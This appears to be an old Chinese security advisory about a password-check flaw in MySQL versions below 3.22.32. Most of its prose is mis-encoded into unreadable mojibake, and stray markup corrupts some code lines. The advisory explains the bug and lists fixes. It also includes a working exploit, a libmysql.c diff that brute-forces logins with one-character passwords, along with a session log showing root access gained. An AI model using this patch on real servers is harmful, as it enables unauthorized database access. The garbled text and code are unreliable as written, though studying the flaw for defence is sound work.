µ±Ç°Î»ÖãºLinux½Ì³Ì - Mysql - ¡ô MysqlµÍ°æ±¾´æÔÚµÄÔ¶³Ì·ÃÎÊ©¶´

¡ô MysqlµÍ°æ±¾´æÔÚµÄÔ¶³Ì·ÃÎÊ©¶´

¡ô MysqlÔ¶³Ì·ÃÎÊ©¶´


    Ò». ¸ÅÊö

MySQLÊÇÒ»¸ö³£ÓõÄСÐÍÊý¾Ý¿âϵͳ£¬¹úÄÚÓкܶàÕ¾µãÕýÔÚʹÓÃËü×÷ΪwebÊý¾Ý¿â¡£
ÔÚMySQLµÄ¿ÚÁîÑéÖ¤»úÖÆÀï´æÔÚ°²È«Â©¶´¡£ËüÔÊÐíÈκÎÓû§´ÓÓÐÄ¿±ê»úÆ÷Êý¾Ý¿â·ÃÎÊȨÏÞ
µÄ»úÆ÷ÉÏÓë¸ÃÊý¾Ý¿â½øÐÐÁ¬½Ó¡£¹¥»÷Õß²»±ØÖªµÀÕʺŵĿÚÁ¶øÖ»ÐèÖªµÀÒ»¸ö¿ÉÓõÄÕʺÅ
Ãû¼´¿É¡£
ËùÓеÍÓÚMysql 3.22.32µÄ°æ±¾¿ÉÄܶ¼ÊÇÓÐÎÊÌâµÄ¡£

¶þ. ϸ½Ú

MySQLµÄ¿ÚÁîÈÏÖ¤µÄ»úÖÆÊÇÕâÑùµÄ£ºµ±Ò»¸ö¿Í»§¶Ë·¢ËÍÒ»¸öÁ¬½ÓÇëÇóµÄʱºò£¬·þÎñ¶Ë»áÊ×
ÏȲúÉúÒ»¸öËæ»ú×Ö·û´®(A)£¬½«Õâ¸ö×Ö·û´®·¢Ë͸ø¿Í»§¶Ë£¬¿Í»§¶Ë»áÓÃÕâ¸ö×Ö·û´®ºÍÓû§
ÊäÈëµÄ¿ÚÁîËù²úÉúµÄHashÖµ(B)Éú³ÉÒ»¸öеÄ×Ö·û´®(C)¡£ ²¢½«Õâ¸öеÄ×Ö·û´®·µ»Ø¸ø·þ
Îñ¶Ë¡£·þÎñ¶Ë½«Ô­ÏȵÄËæ»ú×Ö·û´®(A)ÓëÊý¾Ý¿âÖб£´æµÄ¿ÚÁîHashÖµ(B')ÔÙÉú³ÉÒ»¸ö×Ö·û
´®(C'),±È½ÏÕâÁ½¸ö×Ö·û´®(CºÍC')µÄÄÚÈÝÊÇ·ñÒ»ÖÂ,Èç¹ûÒ»Ö¾ÍÔÊÐíµÇ¼£¬·ñÔò¾Í²»ÔÊÐí
µÇ¼¡£

È»¶ø£¬µ±±È½ÏCºÍC'ÕâÁ½¸ö×Ö·û´®ÄÚÈݵÄʱºò£¬ÓÉÓÚûÓп¼ÂDZȽÏ×Ö·û´®µÄ³¤¶È£¬µ¼ÖÂÁË
ÎÊÌâµÄ²úÉú¡£´Ósql/password.cÖпÉÒÔ¿´µ½ÓÐÎÊÌâµÄ´úÂ벿·Ö£º

my_bool check_scramble(const char *scrambled, const char *message,
ulong *hash_pass, my_bool old_ver)
{
......
while (*scrambled)
{
if (*scrambled++ != (char) (*to++ ^ extra))
return 1; ?* Wrong password */
}
return 0;
}
......

ÕâÀïµÄscrambled¾ÍÊÇ¿Í»§¶ËÌṩµÄ×Ö·û´®C,(*to++ ^ extra))¾ÍÊÇ·þÎñ¶ËÉú³ÉµÄ×Ö·û´®
C'(ÖеÄÒ»¸ö×Ö·û).ÎÒÃÇ¿ÉÒÔ¿´µ½£¬±È½ÏµÄ´ÎÊý¾ö¶¨ÓÚ¿Í»§¶ËÌṩµÄ×Ö·û´®CµÄ³¤¶È¡£ÎÊ
Ìâ¾Í³öÔÚÕâÀïÁË£¬±¾À´·þÎñ¶ËÓ¦µ±Ê×ÏÈÅжÏÕâÁ½¸ö×Ö·û´®³¤¶ÈÊÇ·ñÏàµÈµÄ£¬µ«ÊÇËüûÓУ¬
ËùÒÔÈç¹û¿Í»§¶ËÌṩµÄ×Ö·û´®Ö»ÓÐÒ»¸ö×Ö·û£¬ÄÇôcheck_scramble()½«Ö»±È½ÏCºÍC'µÄµÚ
Ò»¸ö×Ö½Ú¡£


C'µÄÄÚÈÝÊÇËæ»ú²úÉúµÄ£¬ËùÒÔµÚÒ»´ÎµÇ¼ºÍµÚ¶þ´ÎµÇ¼ʱ£¬C'µÄµÚÒ»¸ö×Ö·ûͨ³£ÊDz»Í¬µÄ¡£
ÀýÈ磺
@SQOGRFA µÚÒ»´Î
VV]KPIU_ µÚ¶þ´Î
M[PPRYX^ µÚÈý´Î

µ«ÊÇ£¬¸ù¾Ý·ÖÎö£¬C'µÄÿһ¸ö×Ö·ûÖ»¿ÉÄÜÓÐ32ÖÖ¿ÉÄÜÐÔ£¬¼´:
ABCDEFGHIGKLMNOPQRSTUVWXYZ\_][]@^

ÄÇôÀíÂÛÉÏ˵£¬Èç¹ûÎÒÃÇÿ´ÎÁ¬½Ó¶¼·¢ËÍͬһ¸ö×Ö·û£¨±ÈÈç'A')×÷Ϊ¿ÚÁÄÇô32´ÎÁ¬½Ó
ÖлáÓÐÒ»´Î³É¹¦¡£µ±È»£¬ÕâÖ»ÊÇ´Ó¸ÅÂÊÉÏͳ¼Æ£¬Êµ¼ÊÉϳ¢ÊԵĴÎÊý»á´Ó1´Îµ½100¶à´Î²»µÈ¡£

Èý. ²âÊÔ³ÌÐò

¸ù¾ÝÉÏÃæµÄ·ÖÎö£¬ÎÒÃÇֻҪÿ´Î·¢ËÍÒ»¸ö×Ö·û¸ø·þÎñ¶Ë£¬Èç¹û·µ»Ø´íÎóÐÅÏ¢£¬ÎÒÃÇÔٴη¢
ËÍÕâ¸ö×Ö·û£¬Ö±µ½³É¹¦ÎªÖ¹¡£ÎªÁ˼òµ¥Æð¼û£¬ÎÒÃÇ¿ÉÒÔÐÞ¸ÄmysqlµÄclient³ÌÐò.
ÔÚclient/libmysql.cÖÐ, mysql_real_connect()º¯ÊýÊÇÓÃÀ´Óë·þÎñ¶Ë½¨Á¢Á¬½ÓµÄ¡£

......
MYSQL * STDCALL
mysql_real_connect(MYSQL *mysql,const char *host, const char *user,
const char *passwd, const char *db,
uint port, const char *unix_socket,uint client_flag)
{

......
DBUG_PRINT("info",("user: %s",buff+5));
/* ÕâÀïµÄscramble()º¯Êý½«²úÉúУÑéÓõĿÚÁî×Ö·û´®C£¬È»ºó½«C¸´ÖƵ½strend(buff+5)+1
´¦£¬¼ÈÈ»ÎÒÃÇÖ»ÊÇÒª·¢ËÍÒ»¸ö×Ö·û¹ýÈ¥£¬ÎÒÃÇ¿ÉÒÔ×¢Ê͵ôÕâÁ½ÐУ¬Ö±½Ó½«Ò»¸ö×Ö?br> ¸´ÖƹýÈ¥¼´?br> ?/
?br> ?br> end=scramble(strend(buff+5)+1, scramble_buff, passwd,
?my_bool) (mysql->protocol_version == 9));

if (db && (mysql->server_capabilities & CLIENT_CONNECT_WITH_DB))
{
......
} ?br> ?br> Ð޸ĺó±ä³É: ?br> ?.....
MYSQL * STDCALL
mysql_real_connect(MYSQL *mysql,const char *host, const char *user,
const char *passwd, const char *db,
uint port, const char *unix_socket,uint client_flag)
{

......
DBUG_PRINT("info",("user: %s",buff+5));
?br> /*
end=scramble(strend(buff+5)+1, scramble_buff, passwd,
?my_bool) (mysql->protocol_version == 9));
?/
end = strend(buff+5) +1 ;
*end = 'A';
end ++;
*end = '\0'; ?br>
if (db && (mysql->server_capabilities & CLIENT_CONNECT_WITH_DB))
{
......
}

È»ºóÎÒÃǽ«Õâ¸ömysql_real_connect()¸ÄÃû³Émysql_real_connect_orig(),¹¹ÔìÒ»¸öеÄ
mysql_real_connect(),Ëü½«Ñ­»·µ÷ÓÃÔ­À´µÄmysql_real_connect_orig(),µ±²»¶Ï³¢ÊÔ·¢ËÍ
×Ö·û'A'½øÐÐÁ¬½Ó£¬Ö±µ½Í¨¹ý¿ÚÁîÑé֤Ϊֹ¡£


×¢Ò⣺ÏÂÃæÌṩµÄ³ÌÐò½ö¹©ÔÚ±¾»ú²âÊÔʹÓã¬Çë²»ÒªÓÃÓÚ·Ç·¨Ä¿µÄ£¬ºó¹û×Ô¸º£¡

libmysql.c.diff
8<-----8<-----8<-----8<---- cut here ---8<-----8<-----8<-----8<-----8<----
--- mysql-3.22.27/client/libmysql.c Wed Oct 6 00:37:25 1999
+++ mysql-3.22.27_new/client/libmysql.c Tue Feb 13 14:12:37 2000
@@ -46,6 +46,8 @@
uint mysql_port=0;
my_string mysql_unix_port=0;

+uint trynum=0;
+
#define CLIENT_CAPABILITIES (CLIENT_LONG_PASSWORD | CLIENT_LONG_FLAG | CLIENT_LOCAL_FILES)

#if defined(MSDOS) || defined(__WIN32__)
@@ -985,13 +987,13 @@
}


-/*
+/*
** Note that the mysql argument must be initialized with mysql_init()
** before calling mysql_real_connect !
*/

MYSQL * STDCALL
-mysql_real_connect(MYSQL *mysql,const char *host, const char *user,
+mysql_real_connect_orig(MYSQL *mysql,const char *host, const char *user,
const char *passwd, const char *db,
uint port, const char *unix_socket,uint client_flag)
{
@@ -1276,8 +1278,15 @@
else
read_user_name((char*) buff+5);
DBUG_PRINT("info",("user: %s",buff+5));
- end=scramble(strend(buff+5)+1, scramble_buff, passwd,
- ?my_bool) (mysql->protocol_version == 9));
+/* We skip the step that create valid passwd .:) ?- warning3 */
+ //end=scramble(strend(buff+5)+1, scramble_buff, passwd,
+ // ?my_bool) (mysql->protocol_version == 9));
+ trynum++;
+ printf("Trying %d times\n",trynum);
+ end = strend(buff+5) +1 ;
+ ?end = 'A'; /* We just send one character as password */
+ end ++;
+ ?end = '\0';
if (db && (mysql->server_capabilities & CLIENT_CONNECT_WITH_DB))
{
end=strmov(end+1,db);
@@ -1286,7 +1295,7 @@
}
if (my_net_write(net,buff,(uint) (end-buff)) || net_flush(net) ||
net_safe_read(mysql) == packet_error)
- goto error;
+ return NULL; /* If login failed,we return NULL */
if (client_flag & CLIENT_COMPRESS) /* We will use compression */
net->compress=1;
if (db && mysql_select_db(mysql,db))
@@ -1317,6 +1326,23 @@
DBUG_RETURN(0);
}

+/*
+** We make one fake mysql_real_connect() function,it will "brute force"
+** to guess the right password until succeed ! ?- warning3
+*/
+
+MYSQL * STDCALL
+mysql_real_connect(MYSQL *mysql,const char *host, const char *user,
+ const char *passwd, const char *db,
+ uint port, const char *unix_socket,uint client_flag)
+{
+ MYSQL *res;
+
+ while (!(res=mysql_real_connect_orig(mysql,host,user,passwd,db,port,unix_socket,client_flag)));
+ printf("\nooOH,We come in! ;-)\n\n");
+ return res;
+
+}

static my_bool mysql_reconnect(MYSQL *mysql)
{

>8----->8----->8----->8---- cut here --->8----->8----->8----->8----->8----

[warning3@warninng3 warning3]$ ls -ld libmysql.c.diff mysql-3.22.27
-rw-rw-r-- ? warning3 warning3 ?409 Feb 13 14:24 libmysql.c.diff
drwxrwxr-x 21 warning3 warning3 ?096 Oct 6 06:36 mysql-3.22.27/
[warning3@warninng3 warning3]$ patch -p0 patching file `mysql-3.22.27/client/libmysql.c'
[warning3@warninng3 warning3]$ cd mysql-3.22.27
[warning3@warninng3 mysql-3.22.27]$ ./configure;make;cd client;
[warning3@warninng3 client]$ ./mysql -uroot -pblahblah
Trying 1 times
Trying 2 times
Trying 3 times
Trying 4 times
Trying 5 times
Trying 6 times

ooOH,We come in! ;-)

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 539 to server version: 3.22.27

Type 'help' for help.

mysql>

ËÄ. ½â¾ö°ì·¨

1. Éý¼¶µ½×îа棺


2. ¶ÔÓÚÍⲿÁ¬½Ó×öIpÏÞÖÆ ?br>

¸Ðл:

Robert van der Meulen Ëû·¢ÏÖÁËÕâ¸ö©